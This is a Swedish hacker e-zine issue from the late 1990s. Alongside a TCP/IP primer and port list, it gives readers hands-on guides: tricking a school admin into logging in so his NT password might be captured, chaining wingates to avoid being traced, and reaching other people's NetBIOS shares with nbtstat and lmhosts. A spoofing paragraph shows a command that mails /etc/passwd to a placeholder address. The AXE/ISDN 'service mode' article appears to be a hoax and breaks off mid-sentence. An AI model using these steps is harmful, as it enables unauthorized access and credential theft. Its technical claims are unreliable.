(se. exempel på TCP connection nedan)
Exempel på "3-way-handshake"
¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯
______ ________
| | ===========> 500 | REMOTE |
| TCP | | HOST | (Från Basics of TCP/IP)
| | <======= ACK 501 | |
¯¯¯¯¯¯ ¯¯¯¯¯¯¯¯
TCP andvänder "3-way-Hanshake" för att starta en fast data
överföring. Jag tog upp tidigare lite enkelt om SYN och ACK
Flags och i Exemplet nedan på en "3-way-Handshake" och det är
där dom kommer in :)
Exempel på "3-way-handshake"
¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯
______ ________
1:a | | ===========> SYN SEQ 10 | REMOTE |
2:a | TCP | SYN SEQ 400 ACK 11 <=== | HOST | (Från Basics of
3:e | | ==============> ACK 401 | | TCP/IP)
^ ¯¯¯¯¯¯ ¯¯¯¯¯¯¯¯
|
Steg i överföringen.
-==- Portar som andvänder TCP/IP, UDP -==-
Jag kan berätta att alla dessa services andvänder sig av
TCP/IP för Paket överföring och Växling.
Här kommer en lista på tjänster som andvänder tcp/ip och udp.
Jag har faktiskt rippat den från //Windows/services [lamt va?]
echo 7/tcp
echo 7/udp
discard 9/tcp sink null
discard 9/udp sink null
systat 11/tcp
systat 11/tcp users
daytime 13/tcp
daytime 13/udp
netstat 15/tcp
qotd 17/tcp quote
qotd 17/udp quote
chargen 19/tcp ttytst source
chargen 19/udp ttytst source
ftp-data 20/tcp
ftp 21/tcp
telnet 23/tcp
smtp 25/tcp mail
time 37/tcp timserver
time 37/udp timserver
rlp 39/udp resource # resource location
name 42/tcp nameserver
name 42/udp nameserver
whois 43/tcp nicname # usually to sri-nic
domain 53/tcp nameserver # name-domain server
domain 53/udp nameserver
nameserver 53/tcp domain # name-domain server
nameserver 53/udp domain
mtp 57/tcp # deprecated
bootp 67/udp # boot program server
tftp 69/udp
rje 77/tcp netrjs
finger 79/tcp
link 87/tcp ttylink
supdup 95/tcp
hostnames 101/tcp hostname # usually from sri-nic
iso-tsap 102/tcp
dictionary 103/tcp webster
x400 103/tcp # ISO Mail
x400-snd 104/tcp
csnet-ns 105/tcp
pop 109/tcp postoffice
pop2 109/tcp # Post Office
pop3 110/tcp postoffice
portmap 111/tcp
portmap 111/udp
sunrpc 111/tcp
sunrpc 111/udp
auth 113/tcp authentication
sftp 115/tcp
path 117/tcp
uucp-path 117/tcp
nntp 119/tcp usenet # Network News Transfer
ntp 123/udp ntpd ntp # network time protocol (exp)
nbname 137/udp
nbdatagram 138/udp
nbsession 139/tcp
NeWS 144/tcp news
sgmp 153/udp sgmp
tcprepo 158/tcp repository # PCMAIL
snmp 161/udp snmp
snmp-trap 162/udp snmp
print-srv 170/tcp # network PostScript
vmnet 175/tcp
load 315/udp
vmnet0 400/tcp
sytek 500/udp
biff 512/udp comsat
exec 512/tcp
login 513/tcp
who 513/udp whod
shell 514/tcp cmd # no passwords used
syslog 514/udp
printer 515/tcp spooler # line printer spooler
talk 517/udp
ntalk 518/udp
efs 520/tcp # for LucasFilm
route 520/udp router routed
timed 525/udp timeserver
tempo 526/tcp newdate
courier 530/tcp rpc
conference 531/tcp chat
rvd-control 531/udp MIT disk
netnews 532/tcp readnews
netwall 533/udp # -for emergency broadcasts
uucp 540/tcp uucpd # uucp daemon
klogin 543/tcp # Kerberos authenticated rlogin
kshell 544/tcp cmd # and remote shell
new-rwho 550/udp new-who # experimental
remotefs 556/tcp rfs_server rfs# Brunhoff remote filesystem
rmonitor 560/udp rmonitord # experimental
monitor 561/udp # experimental
garcon 600/tcp
maitrd 601/tcp
busboy 602/tcp
acctmaster 700/udp
acctslave 701/udp
acct 702/udp
acctlogin 703/udp
acctprinter 704/udp
elcsd 704/udp # errlog
acctinfo 705/udp
acctslave2 706/udp
acctdisk 707/udp
kerberos 750/tcp kdc # Kerberos authentication--tcp
kerberos 750/udp kdc # Kerberos authentication--udp
kerberos_master 751/tcp # Kerberos authentication
kerberos_master 751/udp # Kerberos authentication
passwd_server 752/udp # Kerberos passwd server
userreg_server 753/udp # Kerberos userreg server
krb_prop 754/tcp # Kerberos slave propagation
erlogin 888/tcp # Login and environment passing
kpop 1109/tcp # Pop with Kerberos
phone 1167/udp
ingreslock 1524/tcp
maze 1666/udp
nfs 2049/udp # sun nfs
knetd 2053/tcp # Kerberos de-multiplexor
eklogin 2105/tcp # Kerberos encrypted rlogin
rmt 5555/tcp rmtd
mtb 5556/tcp mtbd # mtb backup
man 9535/tcp # remote man server
w 9536/tcp
mantst 9537/tcp # remote man server, testing
bnews 10000/tcp
rscs0 10000/udp
queue 10001/tcp
rscs1 10001/udp
poker 10002/tcp
rscs2 10002/udp
gateway 10003/tcp
rscs3 10003/udp
remp 10004/tcp
rscs4 10004/udp
rscs5 10005/udp
rscs6 10006/udp
rscs7 10007/udp
rscs8 10008/udp
rscs9 10009/udp
rscsa 10010/udp
rscsb 10011/udp
qmaster 10012/tcp
qmaster 10012/udp
-==- Gå vidare -==-
MyWord II (IP Faking) - Myword är en serie textfiler som är
väldigt informativa, dom kan bla. hämtas på swehack.cjb.net
och i en av dem står det om IP Spoofing eller IP Faking välj
själv vilket du tycker låter bäst.
A short overview of IP spoofing: PART I
Simple Spoofing (Non blind) - Är så pass känd så den finns lite
här och där på olika hemsidor, det är bara söka eller maila
mig om du vill ha den.
A short overview of IP spoofing: PART II
Advanced spoofing (Blind) - Är så pass känd så den finns lite
här och där på olika hemsidor, det är bara söka eller maila
mig om du vill ha den.
Understanding IP Addressing
http://www.3com.com/nsc/501302.html. Avancerad information om
hur IP addresseringen är uppbyggt och hur den fungerar.
Simple Attack Against TCP
Tutorial om IP Hijacking.
Security Problems in the TCP/IP Protocol Suite
Beskriver olika hål och attacker i och mot TCP/IP, högt rekomm-
enderad.
-==- Efterord -==-
Jaja, det var bara en del av min privata TCP/IP utbildning, jag
kan nästan garantera att det kommer mera avancerad information
om TCP/IP och olika andra internet kommunikations protokoll
inom snaraste framtid. Om du tycker att jag skrev med en aning
annorlunda svenska så beror det på att jag inte på topp fattar
allt själv, efter som jag just genomgår min privata utbildning,
så du skulle ju kunna kalla artikeln som en uppsats. Men utan
betyg så att säga. Alla flames skickas till /dev/null men
gärna seriösa kommentarer och tips hur jag skulle kunna göra
artikeln bättre uppskattas. Allt skickas till keytrace@usa.net.
En del delar är översatta och en del rippade faktiskt. Men allt
är inte helt rippat så kom inte och klaga, jag har faktiskt
skrivit källförteckning.
-==- Tack Till -==-
Gazzaud, pewp och apotygma
-==- Källor -==-
The Basics of TCP/IP
Introduction to the Internet Protocols
TCP SYN Flooding and IP Spoofing Attacks
TCP packet fragment attacks against firewalls and filters
OSI reference model
The TCP Header Fields
+-------------------------------------------------------------+
| Läs lokala filer i NT [Overmarzz] |
+-------------------------------------------------------------+
Den här texten kommer att beskriva ett enkelt sätt att få tag i
windows/nt lösenord (.pwl) På min skola så är det lösenord på
bios'en, dos går inte att köra (det kommer upp en text som
säger att man ska prata med adminen), vi har bara "Logga av"
och "Program" i startmenyn, I.E är spärrat för att läsa lokala
filer och vi har inga ikoner på skrivbordet. Det kan tyckas som
om det vore svårt att få en pwl fil men INTE. Jag testade allt,
bla word. Word visade sig vara ett prakt exempel på hur man kan
läsa lokalt i NT :) Man kunde klicka på c:\ men det hände
inget, så jag tryckte på favoriter. vips så var c:\windows\fav-
oriter uppe och därifrån klickade jag ett steg tillbaka så jag
hamnade i c:\windows. Ok tänkte jag, det var kul. Men vad
tjänar jag på det? Jag har ännu inte hunnit testa detta jag ska
berätta nu och har hört att inloggnings lösen inte sparas i pwl
... i så fall..synd! men alla fall...Dra ut den fula TP kablen
och spring till adminen som en idiot
J = Jag L = Lam Admin
J - Dator 11 funkar inte..man kan inte logga på
L - Oj bäst JAG tar en titt..
I dator salen så kommer adminen först pröva logga på..
L - Nähä, det var konstigt, jag som är 37331 :/
J - Humm..(stirrar på sladden) Ska inte den sitta i?
L - Jo, heh..(glad och samtidigt stolt att han löste problemet)
J - Pröva om det funkar nu
L - Well kid..You read my mind .. :)
Adminen prövar logga på med sitt user/pass ..
OM nt SPARAR inloggnings lösenordet så är det kört för honom :)
annars så kan man ju alltid pilla i systemet :)
Ok, jag inser att denna filen är lam, men den bör läsas med
lite ironi
+-------------------------------------------------------------+
| Wingates [Overmarzz] |
+-------------------------------------------------------------+
(Denna txt'n är översatt, den riktiga finns på
hackersclub) Wingates är ett bra alternativ för säker hacking
Många wingates loggar allt men sen finns det ju även anonyma
sådana (hur skulle man annars klara sig :)
Denna sortens spoofing kallas non-blind spoofing Du har en ip
fast du går igenom andra servrar
Blind IP spoofing är otroligt avancerat..
Det är när man förutser TCP sequence number av ett 'trusted'
TCP session mellan två två andra machiner och hijack'ar själva
session genom att modifiera hans IP adress och "injecerar" ett
binart commando ex "cat /etc/passwd | mail nån@ting.här".
Och det är svårt... Men om du verkligen vill lära dig om det så
finns det 2-3 bra txt filer om det på min hemsida
Hur du använder wingates rätt
Vi antar att jag har 3st wingates
24.231.12.1 = A
24.103.43.5 = B
24.234.13.2 = C
(Om du har windows)
Som alla vet så är ju telnet clienten (windows) det ända
verktyg som man använder mycket vid "hacking" (kanske lite sta-
rkt ord)
Connecta till A i telnet
Prompten kommer att se ut så här:
WinGate>
Här kan du connecta vidare till andra servrar
bra tänker du...
Men är man paranoid som jag så kan det bli bättre
connecta nu till wingate B
WinGate>24.103.43.5
Och samma prompt kommer upp..
Nu kan du connecta till wingate 3 osv, för att till sist
connecta till den server som du tänkte ..... eller vad du
vill göra..
Din burk -> Din isp -> A -> B -> C -> till den du vill till..
Detta kommer att få effekten att din ip blir svår att spåra
Bara A ser din riktiga IP - B B ser A's IP - C ser B's IP osv..
Om du vill connecta till andra portar så kan du självklart göra
det genom denna enkla förändring
WinGate>121.433.23.1:port_nummer
+-------------------------------------------------------------+
| Säkerhets hål i Netbios [Knash] |
+-------------------------------------------------------------+
System: Windoze 95, NT
Z-Attack = Personen som attackerar :)
Det har upptäckts att någon med ett Win95 system kan "remotly"
skaffa sig tillgång till delade (shared) mappar på Win95/NT
system. Z-Attack andvänder sig av nbtstat för att lista de
aktuella netbios sammanträdande datorerna. Z-Attack lägger
till dator namnet i sin c:/Windows/lmhosts. Han söker efter
datorns namn som han la till i lmhosts. Han söker efter datorn
och förhoppningsvis visar en ikon sig. Då får han access till
alla icke lösenords skyddande mappar.
Så hur utför du detta praktiskt ?
- Steg 1
Här är kommandot du ger som indata i ditt MSDOS skal
¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯
<nbtstat -A ipaddress#>
Om det nu är en netbios session som du ser så ger nbtstat
utdata genom att visa de olika datorerna i en lista. De första
namnet du ser.
- Steg 2
Öppna c:/Windows/lmhosts och lägg till: ipaddress namnpådatorn
ipadress : ip adressen till dator som du vill komma åt.
namnpådatorn: namn på datorn som du vill komma åt.
Spara det och ta bort din egen netbios session.
- Steg 3
Ge kommandot <nbtstat -R> som sedan borde ge purge succsessfu-
l, om inte så är det väl kanske något nätverks fel eller nåt.
- Steg 4
Nu kan du gå och söka efter datorn (sök på datorns namn) om
den nu visar en söt liten ikon, dubbelklicka på den och sen
SKA du se alla delade mappar.
| Lösning på problemet |
Jag tänke vara snäll mot alla LAMA NÄTVERKS ADMINISTRATÖRER och
säga att det finns en lösning till detta. Visserligen är netbi-
os problemet ganska omfattande. Men det bästa du kan göra är
att sätta lösenord på alla delade mappar.
+-------------------------------------------------------------+
| nato.int, whitehouse.gov hacked [Axxezz] |
+-------------------------------------------------------------+
Det har nu blivit känt att www.nato.int samt www.whitehouse.gov
har blivit hackade utav ryska hackers som en protest mot NATO:s
bombningar mot det forna Jugoslavien. Det verkar som tom de me-
st bevakade sidorna fortfarande lätt kan hamna i farozonen så
länge dessa hackers har den rätta motivationen. NATO har ännu
inte uttalat sig om detta hack och Vita Huset påstår att det
var pga en hardvaru krash som sidan var nere nästan 2 dygn.
Källa: SAFER
+-------------------------------------------------------------+
| Enkelt om Terminaler [Knash] |
+-------------------------------------------------------------+
Jag tänke faktiskt ta upp lite om terminaler. Jag ska förklara
vad dom andvänds till och hur dom ser ut, inte mycket mera än
så.
Målgrupp: Extrema wannbee phreakerz (men inte så många kanske
vet vad de riktiga namnen för terminalerna är och
inte många har sätt oranga (LME:OR) terminaler och
inte heller turkosa terminaler (3M:or)
-=- Flames skickas ju till /dev/null såklart -=-
+ Terminal i helhet
+ LSA Plus (Den vita terminalen)
+ OLDschool (Den svarta terminalen)
+ LME (Den oranga terminalen)
+ 3m (Den turkosa terminalen)
-=o[ Terminal i helhet ]o=-
Det finns väl olika namn, personligen kallar jag dem för Term-
inaler men det finns dom som kallar dem Centraler också.
Terminalen sammankopplar flera linor för att sen skicka ut dem
i en i en enskild kabel som går till C-Skåpen som kopplar ihop
100 linor som sen skickas i en enskild kabel till Kocentratio-
ns Centralerna.
-=o[ LSA Plus ]o=-
Har funnits ett tag sitter i de grå Kopplingsboxarna som är
gjorda av metall (idiotförklaring) Även kallade Metall Jappsa-
re. Metall Jappsaren är ett fördelningsskåp av telelinor. Men
till själva terminalen som sammanbinder kablarna (telelinorn-
a) En LSA Plus klarar att sammankoppla max 20 linor och är
12cm lång, 2cm hög och 1,5cm bred.
LSA Plus är faktiskt de namnet som telia andvänder, det är
själva produktnamnet. Populärt bland Phreakers kallas termina-
len faktiskt enkelt och oseriöst för Vit terminal. Jag hade
faktiskt inte tänkt mig att förklara allt för mycket, se
Målgrupp i början av artikeln.
-=o[ OLDSchool ]o=-
Den mest kända terminalen självklart, har funnits sen farfar
lekte i sandlådan. Finns som standard i de runda Kopplingsbox-
arna med svart topp. Terminalen är helsvart med utstående
skruvar som sitter på plintar. Terminalen sammankopplar som
max 10 linor. OLDsch00l är 10,5 cm lång, 1,2cm hög och 9mm
bred.
-=o[ LME ]o=-
LME Terminalen är helorange och nästanlikdant byggda som den
svarta men lite mindre och att skruv plintarna sitter en bit
in i själva terminalen, nackdelen blir då att man inte kan
knäppa på krokodil klämmor, men annars kan man ju andvända
nålar eller liknande (andvänd kreativiteten)
Den oranga LME Terminalen kan sammankoppla som max 10 linor
och är 9,3cm lång, 1,7cm hög och 2cm bred. Hmm som jag sagt
heter ju terminalens synonym betäckning LME, hmm, LME är ett
gammalt moder-bolag till Ericsson (LME=LM Ericsson) LM ericss-
är ett gammalt telebolag som sysslade med växlar och shit. Men
den vita LME terminalen är relativt ny. Hur går det ihop ?
-=o[ 3m ]o=-
3m Terminalen är smart byggt, jag hittade faktiskt den i ett
låst källarrum (en korridor på 200m) den satt fast i ett fett
magasin med en massa terminaler. Den sammankopplar som de fle-
sta max 10 linor, också storlek och skit: 7cm lång, 2cm hög
och 17mm bred.
+-------------------------------------------------------------+
| GSM kan läsa av Elmätare [Knash] |
+-------------------------------------------------------------+
Trådlös energiavläsning via GSM-nätet. Med ny teknik kommer det
bli möjligt. Telias utvecklingsbolag Wireless Maingate AB ska
utveckla tekniken tillsammans med Enermet som är ledande
leverantör av utrustning som avläser energiförbrukning. Genom
att läsa av sina kunders elmätare via GSM kommer energiföretag-
en spara mycket tid och pengar. De slipper skicka ut en person
som ska göra mätningarna. Enermet har sedan tidigare tecknat
ett avtal med Ericsson gällande GSM-terminaler för energimätar-
e. För att kunna erbjuda en helhetslösning för energiavläsning
via GSM krävdes en operatör som kan hantera de nya krav på
kommunikationslösningar som den här marknaden ställer. MainGate
är fokuserade på tjänsteutveckling för maskiner. Med MainGate
som samarbetspartner få vi tillgång till en bred kompetens
inom telecom och IT, det tillsammans med Telias rikstäckande
GSM-nät stärker våra möjligheter att lyckas, säger Bengt
Sundling, VD på Enermet AB. Telia tror att marknaden för
GSM-lösningar för maskin till maskin kommer växa. De beräknar
att 30 procent av GSM-trafiken utgöras av mobil data år 2001.
Rippat från: www.mkf.se/nyheter/
Detta kan ju betyda att lite roliga security holes bildas.
Kanske kommer det sitta SIM kort i elmätaren, eller ännu enkla-
re i själva boxen.
+-------------------------------------------------------------+
| Cellulär styrning, update [Knash] |
+-------------------------------------------------------------+
Angåenda artikeln "Promenad: Cellulär styrning" i Outlaw-04 så
har jag(vi) studerat lite. Har hittat en artikel i "Veckans no-
tiser om Mobil" som du finner ovan. Boxen tyder starkt på att
det är en elmätare. För det första så sitter ett fett märke där
det står "Mätarskåpet skall hållas låst" mätarskåp (hmm, har
kanske något med elmätare att göra?) Sen så ser den i princip
ut likadan med siffor och dyl. Det sitter även en massa proppar
som i ett mätarskåp där elmätaren brukar befinna sig.
+-------------------------------------------------------------+
| Lite rippat om AXE från Fidonet [Knash] |
+-------------------------------------------------------------+
___________________________________________________
# Snabba överföringar över det digitala telenätet #
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Insänd av Håkan Andersson, 2:201/601
Av Björn Felten, 2:203/208
Som ni förmodligen känner till, så kan Telias operatörer logga
in på AXE- stationerna via fjärranslutningar för att utföra det
mesta som behövs. Detta sker via det digitala telenätet, och
går naturligtvis inte att göra utifrån de analoga inkopplingar-
na.
Men vad Telia kanske inte har tänkt på, är att även vanliga ab-
onnenter med ISDN ligger ute på det digitala nätet. Det går
således utmärkt att via ett vanligt ISDN-abonnemang fixa en hel
del roliga saker på AXE - stationen. Protokollet, som användes
är en helt vanlig Kermit, fast med reverserad CRC.
En av de roligare finesserna är den, som användes när man
felanmäler ett abonnemang. Då kopplar operatören, som tog emot
din felanmälan, om din AXE- station så att den ett kort ögonbl-
ick ger en helt digital anslutning hela vägen fram till alla
dina telefoner och modem. Detta för att kunna utföra mätningar,
som inte är möjliga via det analoga nätet. Du har helt enkelt
fått en ISDN-lina under ett kort ögonblick! Detta kallas för
ServiceIngång till LinjeLyssnaren, eller SILL.
Detta, tillsammans med det serviceläge som alla modem med V34
har, och som ibland yttrar sig även vid vanlig drift, genom att
modemet plötsligt börjar låta som ett flipperspel, som har
tiltat, ger intressanta
möjligheter. Serviceläget är avsett för att modemtillverkaren
skall kunna prova modemen snabbt och enkelt. Det går (naturlig-
tvis) inte att komma in i detta läge från modemet självt, genom
någon AT-kod, utan initieras genom en speciell sekvens under
handskakningens första 500ms, och som genereras av den speciel-
la testutrustning, som tillverkaren har. Denna handskakningen
kommer för övrigt alltid först, så en sådan connect tar högst
en halv sekund att etablera. Tyvärr går det inte att komma
ifrån det fruktansvärda oljudet, så detta är ingenting för den
som sover med basen under huvudkudden... :)
I detta serviceläge går modemet helt digitalt, och modulerar
alltså inte signalen för transport över det analoga nätet, utan
det är rena ettor och nollor som sändes. Och detta med den max-
imal a hastighet, som modemets handskakning medger. I den
interna testloopen (enbart modemet) ligger det på kring 2M bps,
och i den externa är det den anslutna serieporten, som sätter
gränsen. De flesta serieportar idag klarar 115k bps, men vissa
klarar ända upp till 230k bps. Detta är alltså den överförings-
hastighet, som blir resultatet. Det senare motsvarar ungefär
40000 cps eller en Mbyte på 25 sekunder...
Nu har jag äntligen fått klart mitt lilla hack, som fixar allt
detta från ISDN-sidan. Det ringer alltså upp AXE-stationen, ko-
pplar om den till digitalt läge ända fram till valfritt V34-mo-
dem, öppnar modemet i testläget och skickar/ hämtar sedan filer
o.dyl. i den maximala
Rippat från: Fidonet
+-------------------------------------------------------------+
| Teleutrustning som klarar år2000 [Knash] |
+-------------------------------------------------------------+
Onödiga artiklar/textfiler finns överallt. Varför inte förstör-
a och göra dem fler. Nedan är en lista på telefonväxlar och
lite teleutrustning som är år2000 kompatibla.
Rippat och klart !
PBX SOM KLARAR ÅR 2000
Leverantör (System) Produkt Kommentar
Alcatel (PBX) A4400, A4200E
Direcom Nitsuko NX64
Direcom Teleste 2000/2200
Doro (PBX) Doro AX-8, AX-8M, AX-32,
AX-32M,
Doro Trippel 10
Doro Median
Doro Link
Doro DX-E
Doro System Cordless
Doro System 2/24, 2/320
Doro Miniväxel 1/4, 2/6,
Doro ISDN 2/8
Doro Index, Doro Index
DECT
COBS System 2000
Siemens Hicom 112, 118
Goldstar-Licencia GSX 208,
(PBX) GSX 408/816,
GSX 1224,
GSX 1832/3672/36112,
GHX 820,
GDK 162/186,
GDK 100,
GDK FP II
Nortel (PBX) Meridian R16,
Meridian R18,
Meridian R20,
Meridian R21,
Meridian R22,
Companion (Trådlöst)
Philips (PBX) Sophos-s50 ssw-640,
Sophos-s100 ssw-640,
Sophos-s250 ssw-640,
Sophos-s1000 ssw-640,
Sophos-s55, ssw-200,205
Sophos-s255,
ssw-200,205
Sophos-2500,ssw-700-730
Sophos-1025, ssw- 730
Telia (PBX) se lista på: www.telia.se
överst på sidan
Övriga system som klarar år 2000
Leverantör (System) Produkt Kommentar
Direcom
(Snabbtelefonväxel) ITT511
Ericsson
(Snabbtelefonväxel) ASE43X
Ericsson
(Snabbtelefonväxel) ASA10101
Ericsson, AsaCorn
(Snabbtelefonväxel) ASA10103
ASA10105
ASA10107
Goldstar-Licencia (CTI) PBX-link,
PBX popup,
PBX telecon.
Nortel ( ACD) Meridian Max rel. 8
Nortel (Samtalsdebitering) Meridian CCR rel. 6.03
Listan är rippad från: Landstingsförbundet
+-------------------------------------------------------------+
| Copyright [Knash] |
+-------------------------------------------------------------+
Jupp, copyright och inte copyfight faktiskt. Ni kan ju rippa
en artikel från zinet och skriva källa om ni snackat med mig om
det. Zinet får spridas lite hit och dit så länge det stannar
oändrat.
+-------------------------------------------------------------+
| Prenumeration [Knash] |
+-------------------------------------------------------------+
-==- S-T-A-R-T-A P-R-E-N-U-M-E-R-A-T-I-O-N -==-
Skicka ett litet mail till keytrace@usa.net med Subscribe O-I
i subjekt fältet.
-==- A-V-S-L-U-T-A P-R-E-N-U-M-E-R-A-T-I-O-N -==-
Skicka ett litet mail till keytrace@usa.net med Unsubscribe O-I
i subjekt fältet.
+-------------------------------------------------------------+
| eX1t() |
+-------------------------------------------------------------+
___ . .
.' `. , . _/_ | ___ , _ /
| | | | | | / ` | | |
| | | | | | | | ` ^ '
`.__.' `._/| \__/ /\__ `.__/| \/ \/
I N F O R M A T I V A
Heretics Inc.
Ascii Development group.
editor cotact: knash@linux.nu